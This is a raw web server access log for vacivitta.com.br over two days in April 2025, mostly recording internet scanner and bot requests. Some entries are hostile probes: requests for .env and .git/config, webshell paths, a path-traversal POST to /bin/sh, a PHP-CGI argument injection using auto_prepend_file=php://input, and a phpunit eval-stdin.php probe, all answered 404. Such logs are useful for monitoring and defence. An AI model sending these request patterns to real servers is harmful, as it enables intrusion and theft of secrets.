vacivitta.com.br:80
104.248.215.151 - - [27/Apr/2025:19:06:41 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
104.248.215.151 - - [27/Apr/2025:19:06:41 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
154.81.156.7 - - [27/Apr/2025:19:08:03 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [27/Apr/2025:19:10:32 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [27/Apr/2025:19:20:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
174.49.82.216 - - [27/Apr/2025:19:27:19 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
185.218.86.4 - - [27/Apr/2025:19:28:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
44.200.28.234 - - [27/Apr/2025:19:49:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Linux; Android 5.0.2; LG-V410/V41020b Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Safari/537.36"
vacivitta.com.br:80
44.200.28.234 - - [27/Apr/2025:19:49:41 -0300] "GET /assets/index-DogtGhmX.js HTTP/1.1" 200 839022 "-" "Mozilla/5.0 (Linux; Android 5.0.2; LG-V410/V41020b Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [27/Apr/2025:19:53:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [27/Apr/2025:20:16:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:15 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:15 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:15 -0300] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:15 -0300] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:15 -0300] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:15 -0300] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:16 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:16 -0300] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:16 -0300] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
138.197.123.57 - - [27/Apr/2025:20:40:16 -0300] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
167.94.138.205 - - [27/Apr/2025:20:41:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.205 - - [27/Apr/2025:20:41:31 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.205 - - [27/Apr/2025:20:41:34 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.205 - - [27/Apr/2025:20:41:36 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
167.94.138.205 - - [27/Apr/2025:20:41:45 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.205 - - [27/Apr/2025:20:41:46 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
134.122.106.248 - - [27/Apr/2025:20:42:20 -0300] "GET /aaa9 HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
134.122.106.248 - - [27/Apr/2025:20:42:24 -0300] "GET /aab8 HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
134.122.106.248 - - [27/Apr/2025:20:42:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.7 - - [27/Apr/2025:20:45:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
43.130.53.252 - - [27/Apr/2025:20:47:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
154.81.156.54 - - [27/Apr/2025:20:59:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [27/Apr/2025:21:17:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [27/Apr/2025:21:32:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [27/Apr/2025:21:41:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
170.64.207.118 - - [27/Apr/2025:21:56:38 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [27/Apr/2025:22:15:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.181.2.11 - - [27/Apr/2025:22:16:25 -0300] "\x16\x03\x01\x05\xc4\x01" 404 - "-" "-"
vacivitta.com.br:80
5.181.2.11 - - [27/Apr/2025:22:16:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
vacivitta.com.br:80
185.218.86.4 - - [27/Apr/2025:22:23:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
147.185.132.210 - - [27/Apr/2025:22:34:38 -0300] "GET / HTTP/1.0" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
154.81.156.54 - - [27/Apr/2025:22:53:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [27/Apr/2025:23:31:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
123.58.196.164 - - [27/Apr/2025:23:33:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
vacivitta.com.br:80
123.58.196.164 - - [27/Apr/2025:23:33:29 -0300] "GET //ico.ico HTTP/1.1" 200 100526 "-" "Go-http-client/1.1"
vacivitta.com.br:80
123.58.196.164 - - [27/Apr/2025:23:33:30 -0300] "GET /robots.txt HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
93.174.93.12 - - [27/Apr/2025:23:35:53 -0300] "GET / HTTP/1.0" 200 488 "-" "Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00"
vacivitta.com.br:80
185.252.251.88 - - [27/Apr/2025:23:44:30 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
154.81.156.35 - - [27/Apr/2025:23:50:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
45.79.163.53 - - [27/Apr/2025:23:59:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
43.156.228.27 - - [28/Apr/2025:00:03:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:00:08:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:00:15:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:00:16:27 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
185.218.84.178 - - [28/Apr/2025:00:18:22 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
148.153.45.238 - - [28/Apr/2025:00:28:29 -0300] "GET /YoDP HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
vacivitta.com.br:80
148.153.45.238 - - [28/Apr/2025:00:28:29 -0300] "GET /rp8C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
vacivitta.com.br:80
148.153.45.238 - - [28/Apr/2025:00:28:29 -0300] "GET /aab8 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
vacivitta.com.br:80
148.153.45.238 - - [28/Apr/2025:00:28:29 -0300] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
vacivitta.com.br:80
148.153.45.238 - - [28/Apr/2025:00:28:29 -0300] "GET /aab9 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
vacivitta.com.br:80
148.153.45.238 - - [28/Apr/2025:00:28:29 -0300] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:00:44:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [28/Apr/2025:01:03:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:01:22:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
147.185.132.111 - - [28/Apr/2025:01:22:39 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
147.185.132.111 - - [28/Apr/2025:01:22:39 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
184.105.139.70 - - [28/Apr/2025:01:51:13 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:01:53:13 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:02:00:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:02:10:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:02:25:00 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
45.95.232.6 - - [28/Apr/2025:02:29:22 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:02:33:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /fhir-server/api/v4/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseR3/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseR4/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /r4/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /fhir/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseDstu3/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /r3/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /r2/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseR5/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /r5/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseDstu2/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseR2/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /fhir-server/api/v4/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseR3/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseDstu3/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseR4/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /fhir/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /r3/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /r5/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseR5/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /r2/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseDstu2/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /baseR2/metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
193.174.89.19 - - [28/Apr/2025:02:51:06 -0300] "GET /metadata HTTP/1.1" 404 - "-" "FH Muenster/Security-Scanner/fh-muenster.de"
vacivitta.com.br:80
83.40.56.12 - - [28/Apr/2025:03:04:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Hello-World/1.0"
vacivitta.com.br:80
185.218.84.178 - - [28/Apr/2025:03:06:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:03:07:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.20 - - [28/Apr/2025:03:10:16 -0300] "CONNECT ifconfig.co:443 HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
154.81.156.20 - - [28/Apr/2025:03:10:16 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
162.216.150.218 - - [28/Apr/2025:03:11:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
154.81.156.20 - - [28/Apr/2025:03:14:56 -0300] "-" 408 - "-" "-"
vacivitta.com.br:80
154.81.156.20 - - [28/Apr/2025:03:15:06 -0300] "-" 408 - "-" "-"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:03:27:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:03:38:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [28/Apr/2025:03:48:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:04:09:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
43.159.140.236 - - [28/Apr/2025:04:21:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
170.64.207.118 - - [28/Apr/2025:04:38:01 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:04:46:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:04:51:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
117.50.180.132 - - [28/Apr/2025:05:12:16 -0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
117.50.180.132 - - [28/Apr/2025:05:12:48 -0300] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
117.50.180.132 - - [28/Apr/2025:05:12:58 -0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
117.50.180.132 - - [28/Apr/2025:05:12:58 -0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
65.49.1.99 - - [28/Apr/2025:05:20:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
vacivitta.com.br:80
65.49.1.98 - - [28/Apr/2025:05:23:41 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
vacivitta.com.br:80
65.49.1.100 - - [28/Apr/2025:05:24:08 -0300] "GET /geoserver/web/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:05:24:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:05:31:07 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:05:46:07 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
